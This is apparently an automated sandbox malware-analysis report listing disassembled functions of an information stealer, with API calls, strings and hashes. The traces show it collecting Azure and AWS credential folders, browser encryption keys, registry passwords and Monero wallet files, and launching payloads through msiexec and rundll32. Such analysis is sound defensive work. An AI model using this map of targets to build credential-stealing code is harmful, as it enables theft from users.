                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: e576cdd84b2e053d46bcff442eb31ec9ad744eaafeea1362b617eb16408e6075
                                        • Instruction ID: 8ad7ebbe344ac91531bd72318b5a98a8f5341b0ba0860a68222d2974020e6067
                                        • Opcode Fuzzy Hash: e576cdd84b2e053d46bcff442eb31ec9ad744eaafeea1362b617eb16408e6075
                                        • Instruction Fuzzy Hash: F2E1F072900118ABDB14EBA4EC96FEEB778AF98300F404159F10677196DF306A4ACF65
                                        Function 009212D0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 310COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID: (k$8k$@k
                                        • API String ID: 2001356338-1509224607
                                        • Opcode ID: 2402b351fc0e9737d7da2a04b0f82b2f1fa899e436317b491e54b8e52801d70a
                                        • Instruction ID: 58edad4922e2105c385b9ecdf9fcc64728f681879e697cd9d374f3d54c73baf7
                                        • Opcode Fuzzy Hash: 2402b351fc0e9737d7da2a04b0f82b2f1fa899e436317b491e54b8e52801d70a
                                        • Instruction Fuzzy Hash: D8C187B69012299BCB14EF60EC89FEE7379BFA4304F0045D8F50A67245DE74AA85CF91
                                        Function 00929010 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0092906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: hk$image/jpeg
                                        • API String ID: 2244384528-222496248
                                        • Opcode ID: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                                        • Instruction ID: 7c36494abd805e67270bb53652853983376242324ad5822cb9e3a4ea1db48ec4
                                        • Opcode Fuzzy Hash: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                                        • Instruction Fuzzy Hash: 2B71FC71A10208ABDB04DFE4DC89FEEB7B9BF88701F108648F615A7294DF74A945CB61
                                        Function 00924D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00924DCD
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                                          • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00924E59
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                          • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                          • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00924EE5
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249B0
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,009308D2), ref: 009249C5
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249E2
                                          • Part of subcall function 00924910: PathMatchSpecA.SHLWAPI(?,?), ref: 00924A1E
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,006BEAD8), ref: 00924A4A
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FF8), ref: 00924A5C
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A70
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FFC), ref: 00924A82
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A96
                                          • Part of subcall function 00924910: CopyFileA.KERNEL32(?,?,00000001), ref: 00924AAC
                                          • Part of subcall function 00924910: DeleteFileA.KERNEL32(?), ref: 00924B31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 3f5bec3bc5d823f04a0f47214bc24ab34fbb62d420ddba71d3206ee9f88650e5
                                        • Instruction ID: 930a0d5a1f7b5e86638af0f35c3ceb276b399d1b912f8a1caebfb0350f2f9507
                                        • Opcode Fuzzy Hash: 3f5bec3bc5d823f04a0f47214bc24ab34fbb62d420ddba71d3206ee9f88650e5
                                        • Instruction Fuzzy Hash: 3641B5BAA4021867D714F760FC47FED3338ABA4704F004594B649660C1EEF56BC98F92
                                        Function 00924280 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 009242EC
                                        • lstrcat.KERNEL32(?,006BE458), ref: 0092430B
                                        • lstrcat.KERNEL32(?,?), ref: 0092431F
                                        • lstrcat.KERNEL32(?,006BD4A0), ref: 00924333
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                                          • Part of subcall function 00919CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 009293C0: GlobalAlloc.KERNEL32(00000000,009243DD,009243DD), ref: 009293D3
                                        • StrStrA.SHLWAPI(?,006BE1B8), ref: 009243F3
                                        • GlobalFree.KERNEL32(?), ref: 00924512
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                          • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                          • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 009244A3
                                        • StrCmpCA.SHLWAPI(?,009308D1), ref: 009244C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009244D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 009244E5
                                        • lstrcat.KERNEL32(00000000,00930FB8), ref: 009244F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID: Xk
                                        • API String ID: 3541710228-89453425
                                        • Opcode ID: 6095b2b461c906d9022810398e88d6c9fa0dfd8c355f7ed87d202b723309a735
                                        • Instruction ID: 4ac261751c416748afdb3716ce141501290d9199dd42d2168f4b430a35260306
                                        • Opcode Fuzzy Hash: 6095b2b461c906d9022810398e88d6c9fa0dfd8c355f7ed87d202b723309a735
                                        • Instruction Fuzzy Hash: 7D715676900218ABDB14EBA0EC95FEE777DAF88300F004598F605A7185EE75EB49CF91
                                        Function 00922E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009231C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0092335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009234EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                                        • Instruction ID: b4ab002048f3a420275d93faced2fea864aee9aeaf85ccae5f6b183e598b69d0
                                        • Opcode Fuzzy Hash: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                                        • Instruction Fuzzy Hash: 311213728001289BDB19FBA0EC92FDEB738AF94300F504559F5067619AEF342B4ACF56
                                        Function 009252C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                          • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                          • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                          • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                          • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                          • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                                        • lstrlen.KERNEL32(00000000), ref: 0092532F
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                                        • lstrlen.KERNEL32(00000000), ref: 00925383
                                        • lstrlen.KERNEL32(00000000), ref: 009253AE
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: c9caeaa704cfe3221df1a42c33b92f84c45db4d2da0e49c7b5170678eeb76614
                                        • Instruction ID: 9ed701f02de49cd2742bcb3dd83863a51d0ddbaad037feba2ac628b2ad63875b
                                        • Opcode Fuzzy Hash: c9caeaa704cfe3221df1a42c33b92f84c45db4d2da0e49c7b5170678eeb76614
                                        • Instruction Fuzzy Hash: 97514F31911158ABCB18FF60ED92FED7779AF94300F504018F9066B1A6EF346B46CBA6
                                        Function 00911310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 009112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                                          • Part of subcall function 009112A0: RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                                          • Part of subcall function 009112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                                          • Part of subcall function 009112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                                          • Part of subcall function 009112A0: RegCloseKey.ADVAPI32(?), ref: 009112FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091134F
                                        • lstrlen.KERNEL32(?), ref: 0091135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00911377
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00911465
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 009114EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 412bb9d3af2aae852ad041399929d41b68da8a5b203cd20e571937cd8813b98c
                                        • Instruction ID: e8c9e9a3b4c1d6ca09ca13f13a6f234b34e30260036b135dffee4198de570190
                                        • Opcode Fuzzy Hash: 412bb9d3af2aae852ad041399929d41b68da8a5b203cd20e571937cd8813b98c
                                        • Instruction Fuzzy Hash: D95137B2D5012957CB15FB60ED92FED737CAF94300F4045D8B60A62096EE706B89CFA6
                                        Function 009175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 009172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                                          • Part of subcall function 009172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                                          • Part of subcall function 009172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                                          • Part of subcall function 009172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                                          • Part of subcall function 009172D0: HeapFree.KERNEL32(00000000), ref: 00917459
                                        • lstrcat.KERNEL32(00000000,009317FC), ref: 00917606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00917648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 0091765A
